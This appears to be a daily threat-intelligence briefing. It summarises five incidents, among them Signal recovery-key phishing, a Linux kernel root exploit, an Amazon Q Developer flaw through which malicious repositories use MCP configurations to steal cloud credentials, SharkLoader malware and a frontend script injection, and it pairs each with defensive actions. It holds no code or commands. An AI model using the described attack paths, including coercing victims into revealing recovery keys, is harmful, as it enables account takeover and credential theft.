TL;DR
Russian intelligence expanded Signal phishing to target Backup Recovery Keys. Linux kernel privilege escalation (CVE-2026-46331) has working exploit. AWS Q flaw allows credential theft via malicious repositories. Immediate patching and user education required.
Executive Summary
- FBI and CISA warn that Russian intelligence phishing attacks targeting Signal now coerce victims into revealing Backup Recovery Keys, escalating account compromise beyond temporary credential theft.
- Linux kernel out-of-bounds write (CVE-2026-46331, “pedit COW”) enables local unprivileged users to gain root access; a working public exploit is available.
- Amazon Q Developer flaw (CVE-2026-12957, CVSS 8.5) allows malicious repositories to execute arbitrary commands and exfiltrate cloud credentials; AWS has patched the vulnerability.
- New SharkLoader malware family, tracked as StrikeShark, delivers Cobalt Strike Beacon on compromised hosts.
- Polymarket customers lost an estimated $3 million after malicious script injection via third-party vendor breach.
Top Threats Today
1. Russian Intelligence Expands Signal Phishing to Backup Recovery Keys
Severity: HIGH Affected: Government
The FBI and CISA have updated their March warning about Russian intelligence phishing Signal accounts. Attackers have escalated their technique: they now coerce targets into handing over their Signal Backup Recovery Key [1]. Once obtained, the attacker can restore the account's backup and read historical messages [1][2]. This represents a significant evolution from previous credential-only theft, as recovery keys provide persistent access to encrypted message history [2].
Sources:[1] The Hacker News[2] BleepingComputer
Recommended Action
- Brief users on Signal phishing tactics and the critical sensitivity of Backup Recovery Keys; advise never sharing these keys even with apparent support contacts
- Enable multi-factor authentication and device verification features on messaging platforms
- Monitor for suspicious Signal account access logs and unexplained backup restoration attempts
2. Linux Kernel Privilege Escalation (CVE-2026-46331) with Public Exploit
Severity: HIGH Affected: Technology
A flaw in the Linux kernel's traffic-control subsystem allows local unprivileged users to gain root access on affected systems [1]. CVE-2026-46331, nicknamed “pedit COW,” is an out-of-bounds write in the packet-editing action (act_pedit) that corrupts shared page-cache memory [1]. A public, working exploit is available, increasing the risk of immediate weaponization [1].
Sources:[1] The Hacker News
Recommended Action
- Prioritize Linux kernel patching on all affected systems; identify systems where local-user privilege escalation poses highest risk (shared multi-tenant environments, container hosts)
- Review and restrict local user access on production systems; apply principle of least privilege
- Monitor kernel logs for unusual act_pedit or memory corruption events
3. Amazon Q Developer Credential Theft via Malicious Repositories (CVE-2026-12957)
Severity: HIGH Affected: Technology
A high-severity flaw in Amazon Q Developer (CVSS 8.5) allowed a malicious repository to run commands and steal a developer's cloud credentials [1]. The attack path was short: a developer opens the repository, trusts the workspace, and Amazon Q automatically executes configurations that exfiltrate cloud credentials via Model Context Protocol (MCP) configurations ⚠[1]. AWS has patched the vulnerability and published an advisory to inform customers [2].
Sources:[1] The Hacker News[2] SecurityWeek
Recommended Action
- Update Amazon Q Developer to the latest patched version immediately
- Review recent Amazon Q workspace activity logs to identify repositories opened and trusted by developers
- Rotate any cloud credentials that may have been exposed; audit CloudTrail for unauthorized API calls using developer credentials
- Restrict Amazon Q MCP configuration execution or require explicit approval before running untrusted repository configurations
4. SharkLoader Malware Deploys Cobalt Strike in StrikeShark Campaign
Severity: HIGH Affected: Technology
A newly discovered cyber attack campaign delivers SharkLoader, a previously undocumented malware family that acts as a loader for deploying Cobalt Strike Beacon on compromised hosts [1]. Kaspersky is tracking the activity under the moniker StrikeShark [1]. The campaign indicates adversaries are leveraging custom loaders to evade detection and establish persistent command-and-control access ⚠[1].
Sources:[1] The Hacker News
Recommended Action
- Scan endpoints and networks for Cobalt Strike beacon signatures and network indicators of compromise associated with SharkLoader
- Review email and web-gateway logs for malware delivery vectors; block identified C2 domains and IP addresses
- Monitor for lateral movement and credential dumping activity typical of Cobalt Strike post-exploitation
5. Polymarket Supply-Chain Attack: $3 Million in Customer Losses
Severity: HIGH Affected: Finance
Polymarket customers lost an estimated $3 million after hackers injected a malicious script into the platform's frontend following a breach at a third-party vendor [1]. Polymarket stated it will fully reimburse affected customers [1]. The attack demonstrates the critical risk posed by third-party dependencies in customer-facing applications.
Sources:[1] BleepingComputer
Recommended Action
- If you use third-party vendors for frontend hosting or scripts, immediately verify their security posture and audit recent code changes for unauthorized modifications
- Implement Content Security Policy (CSP) headers and Subresource Integrity (SRI) checks to detect injected scripts
- Review vendor access logs and incident response reports; monitor for similar injection patterns targeting your organization
Ongoing Coverage
Cisco and related vendors: Earlier coverage of active Cisco exploitation and FortiBleed credential harvesting remains relevant; see our June 25 briefing for details on CISA-mandated patching deadlines.
Today’s Action Checklist
- ☐ URGENT: Patch Linux systems for CVE-2026-46331 (pedit COW); prioritize shared and container environments
- ☐ URGENT: Update Amazon Q Developer to patch CVE-2026-12957; audit recent workspace/repository activity and rotate cloud credentials
- ☐ HIGH: Disseminate Signal phishing advisory to users; reinforce that Signal support will never request Backup Recovery Keys
- ☐ HIGH: Scan for SharkLoader and Cobalt Strike indicators; review email/web logs for malware delivery and block identified C2 domains
- ☐ MEDIUM: Review third-party vendor dependencies in frontend and SaaS applications; implement CSP and SRI controls